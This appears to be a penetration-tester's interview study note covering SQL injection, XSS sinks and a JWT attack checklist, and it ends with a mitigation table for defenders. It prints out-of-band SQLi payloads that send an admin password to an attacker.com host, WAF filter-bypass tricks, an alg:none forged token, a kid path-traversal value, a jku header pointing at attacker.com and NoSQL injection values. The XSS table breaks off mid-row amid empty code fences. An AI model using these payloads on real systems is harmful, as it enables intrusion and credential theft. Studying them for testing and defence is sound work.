# Interview
Question
1. What is XSS?
2. What is CSP?
3. How do nmap uses sT flag and discovers that the port is open?
4. CSP is implemented but still there is XSS β how?
5. How to bypass file upload restrictions?
6. What is double extension upload? How can it lead to RCE?
7. What are the types of Windows privilege escalation or attacks?
8. How to generate a CVSS score for a live vulnerability?
9. What is SOP (Same-Origin Policy)?
10. What is CORS and how can it be misconfigured?
11. What are JWT-based attacks? How to exploit them?
12. What is NoSQLi (NoSQL Injection)?
13. What is LDAP Injection and how is it performed?
14. If HTTPS is enabled, how does Burp Suite intercept requests?
15. What is SSRF (Server-Side Request Forgery)?
16. What is SSTI (Server-Side Template Injection)?
17. JWT should be stored where β localStorage or sessionStorage?
18. How to exploit SSRF if localhost/127.0.0.1 is blocked?
19. What is the methodology for API pentesting?
20. Will you be able to perform a 10,000-endpoint API pentest?
Sqli
1. What is sql injection ?
* In band sqli : error based sqli , **Union-Based SQLi**
* Blind SQLi : Boolean based sqli, Time based sqli
* Out band sqli: He we get the out put from different sources like dns and http
For mssql we can use
```
'; EXEC master..xp_dirtree '\\attacker.com\share' --
```
For mysql we can use
```
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users WHERE username='admin'),'.attacker.com\\abc'));
```
```
π§ Bypasses for Filters & WAFs
SQLi filters often block common patterns (', --, UNION, OR, =, etc.). Here are bypass tricks:
1. Case Variation:
UnIoN SeLeCt ...
2. Inline Comments:
UN/**/ION/**/SELECT
SELE/*comment*/CT
3. URL Encoding:
%27 OR %271%27=%271 -- (for ')
4. Hex Encoding:
SELECT 0x61646d696e -- returns 'admin'
5. Double Encoding:
%2527 instead of %27
6. Whitespace Bypass:
UNION%0ASELECT
UNION/**/SELECT
7. Tab Bypass:
UNION%09SELECT
8. Logical Operators:
' OR TRUE--
' OR 1=1--
9. Using LIKE, REGEXP, etc.
' OR username LIKE 'a%'
```
Xss
## π‘οΈ Ultimate XSS Sink Reference (JavaScript Functions Leading to XSS)
This document contains an exhaustive list of JavaScript functions, DOM APIs, and browser behaviors that can lead to Cross-Site Scripting (XSS) when used improperly with user-controllable input.
### π₯ What is XSS?
**Cross-Site Scripting (XSS)** is a web vulnerability where an attacker injects malicious scripts into websites, affecting users who interact with that site.
***
### π₯ 1. JavaScript Code Execution Functions
These execute any string as JavaScript. Extremely dangerous if fed with untrusted input.
| Function | Example | Risk |
| --------------------- | ------------------------------------ | ----------- |
| `eval()` | `eval(userInput)` | π¨ Critical |
| `Function()` | `new Function(userInput)` | π¨ Critical |
| `setTimeout()` | `setTimeout(userInput)` (if string) | π¨ High |
| `setInterval()` | `setInterval(userInput)` (if string) | π¨ High |
| `document.write()` | `document.write(userInput)` | π¨ High |
| `document.writeln()` | Same as above | π¨ High |
| `window.execScript()` | Obsolete but risky | β οΈ |
| `setImmediate()` | (Node/Electron) | β οΈ |
***
### π¨ 2. HTML Injection into the DOM
These directly place HTML/JS into the page. Must be avoided or strictly sanitized.
| Sink | Description | Risk |
| -------------------------- | --------------------- | ---- |
| `innerHTML` | Inserts raw HTML | π¨ |
| `outerHTML` | Same | π¨ |
| `insertAdjacentHTML()` | Appends unsafe HTML | π¨ |
| `element.append()` | Unsafe if HTML passed | β οΈ |
| `element.prepend()` | Same as above | β οΈ |
| `element.after()` | Same | β οΈ |
| `element.before()` | Same | β οΈ |
| `element.replaceWith()` | Same | β οΈ |
| `textContent`, `innerText` | β
Safe | |
***
### π 3. Dangerous Attribute Injections
Injecting into HTML attributes (e.g., `src`, `href`, `onerror`) can lead to XSS.
| Attribute | Example |
| ----------------------------------------------- | ------------------------------------ |
| `setAttribute()` | `setAttribute('onerror', userInput)` |
| `src`, `href`, `action`, `poster`, `formAction` | Must validate input |
| `data`, `style`, `title`, `alt`, `id` | Validate to avoid social engineering |
***
### π 4. Location & URL-Based Sinks
These reflect the URL and are often used in unsafe rendering or DOM reads.
| Source | Description |
| ----------------- | ----------------------------- |
| `location.href` | Full URL |
| `location.search` | Query string |
| `location.hash` | Fragment |
| `document.URL` | Full document URI |
| `window.name` | Cross-domain persistent input |
***
### βοΈ 5. Browser APIs That Render HTML/Execute JS
| API | Risk |
| --------------------------------- | --------------------------- |
| `DOMParser().parseFromString()` | Renders HTML from string |
| `XMLHttpRequest.responseText` | Unsafe if inserted into DOM |
| `fetch().then(res => res.text())` | Same as above |
| `WebView.evalJS()` | (Mobile apps) RCE risk |
| `postMessage()` | Input vector, not sink |
| `` | Executes inline HTML/JS |
| `` | Can redirect with JS |
| `
Jwt attacks
## π οΈ π JWT Penetration Testing Checklist (Fully Detailed)
***
### π 1. π Basic Enumeration
#### β
Test:
* Token Structure: Is it a JWT?
* Format: `header.payload.signature`
* Decode JWT (Base64):
* Header: algorithm used?
* Payload: roles, expiry, userID, admin flag?
#### π Tools:
```
```
```
```
```
```
```bash
# Decode manually
echo 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9' | base64 -d
```
Or use:
*
* Burp Suite extension: **JWT Editor**, **Hackvertor**
***
### β οΈ 2. π₯ Algorithm-Based Attacks
***
#### 𧨠a. **`alg: none` attack**
**π© When vulnerable:**
* JWT header: `"alg": "none"`
* Server **doesn't verify signature**
**π§ͺ Test:**
1. Change header to:
```
```
```
```
```
```
* ```json
{ "alg": "none", "typ": "JWT" }
```
* Remove the signature (or leave it empty).
* Modify payload (e.g., `"admin": true`)
* Base64 encode and send token:
```
```
```
```
```
```
1. ```
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJhZG1pbiI6dHJ1ZX0.
```
β
If accepted: Critical vulnerability.
***
#### 𧨠b. **Algorithm Confusion (RS256 β HS256)**
**π© When vulnerable:**
* Server expects **asymmetric RS256** (public/private key), but allows **symmetric HS256** (HMAC).
**π§ͺ Test:**
1. Change alg to `HS256`
2. Use **server's public key** as the secret key to sign
3. Resign the token with HMAC using public key
β
If accepted: Server confused symmetric vs. asymmetric algorithms.
**π¦ Tools:**
* `jwt_tool.py` β `--exploit alg_none`, `--exploit alg_hs256`
***
### π 3. π Signature Key Bruteforce
***
#### 𧨠a. **Weak secret / brute force**
**π© When vulnerable:**
* HS256, HS384, HS512 used with a **guessable shared secret**.
**π§ͺ Test:**
```
```
```
```
```
```
```bash
python3 jwt_tool.py -d -S wordlist.txt
```
Or use:
* `jwtcrack.py`
* Burp Suite Intruder + `SecLists` weak passwords list
β
If cracked, attacker can forge arbitrary tokens.
***
### β³ 4. π§ͺ Expiry / Time-Based Attacks
***
#### βοΈ a. **Modify `exp`, `nbf`, `iat` fields**
* Try to bypass expiry:
```
```
```
```
```
```
```json
{ "exp": 9999999999 }
```
* Try pre-validating tokens:
```
```
```
```
```
```
```json
{ "nbf": 0, "iat": 0 }
```
β
If server does not verify these fields β logic flaw.
***
### π§ 5. π Privilege Escalation
***
#### π― Target fields like:
* `isAdmin`
* `role`
* `userid`
* `permissions`
* `access_level`
**π§ͺ Test:**
1. Change payload:
```
```
```
```
```
```
1. ```json
{ "role": "admin", "userid": 1 }
```
2. Resign (if possible) or use `none`/`bruteforced` key
β
If access granted β vertical privilege escalation.
***
### π 6. π Replay Attack
***
#### π§ͺ Test:
* Use captured JWT on another account/session
* See if same token grants access β token not scoped to user
β
If works β JWT not bound to session/IP/device
***
### π£ 7. πͺ Injection in Payload
***
#### 𧨠a. **SQL Injection / NoSQL Injection**
* JWT is used in database queries?
**Payload:**
```
```
```
```
```
```
```json
{ "username": {"$ne": null} }
```
or
```
```
```
```
```
```
```json
{ "userid": "1' OR '1'='1" }
```
β
If DB logic accepts it β critical injection risk.
***
### πͺ€ 8. π§ͺ IDOR + JWT
***
#### π― Use JWT to access other userβs data:
```
```
```
```
```
```
```json
{ "userid": 1234 }
β Try other user IDs
```
β
If no access control enforced β Insecure Direct Object Reference.
***
### 𧩠9. π¦ JWT in Cookies / Storage
***
#### π§ͺ Test:
* Can you overwrite the cookie?
* Is the JWT in `localStorage` or `sessionStorage`?
* Vulnerable to XSS?
* Can you refresh expired tokens? (Look for refresh tokens)
β
If client has full control β combine with XSS
***
### π 10. Refresh Token Exploits
***
#### π§ͺ Test:
* Capture refresh token
* Try replaying
* Try CSRF on refresh endpoint
* Does it return new access token?
β
If refresh token never expires / is not bound β long-term hijack possible.
***
### π₯ 11. Advanced & Real-World Exploits
***
#### π© a. **Key Disclosure via LFI**
* If the private key is accessible via LFI β attacker can sign own tokens.
#### π© b. **Kid Header Injection**
```
```
```
```
```
```
```json
{ "kid": "../../../../../../etc/passwd" }
```
β
If used to load keys from disk, this can lead to **path traversal + key loading**.
***
#### π© c. **JWT in `Authorization` header (CSRFable)**
```
```
```
```
```
```
```http
Authorization: Bearer
```
β
If the token is used in a header **without SameSite protection**, you may be able to CSRF it from another origin.
***
#### π© d. **JWK Injection**
If app supports `jku` or `x5u` in JWT header:
```
```
```
```
```
```
```json
{
"jku": "https://attacker.com/mykey.json"
}
```
β
If accepted β attacker can inject their key + sign arbitrary tokens.
***
### π§° Tools & Wordlists
* π§ [`jwt_tool`](https://github.com/ticarpi/jwt_tool)
* π§ [`jwt-cracker`](https://github.com/brendan-rius/jwt-cracker)
* π§ [`JOSEPH`](https://github.com/c-johansen/joseph)
* π Wordlists: SecLists (`Passwords`, `JWT Secrets`, etc.)
***
### 𧱠Mitigation Cheatsheet (for defenders)
| Issue | Mitigation |
| --------------------------- | ------------------------------------- |
| `alg: none` | Always enforce algorithm server-side |
| Weak secret | Use long, random keys (256+ bits) |
| Exp tampering | Enforce expiration strictly |
| Forged roles | Validate roles on backend |
| Token reuse | Use short-lived tokens + refresh flow |
| Key confusion (HS256/RS256) | Donβt allow multiple algs |
| Kid/path injections | Use static key loading, not dynamic |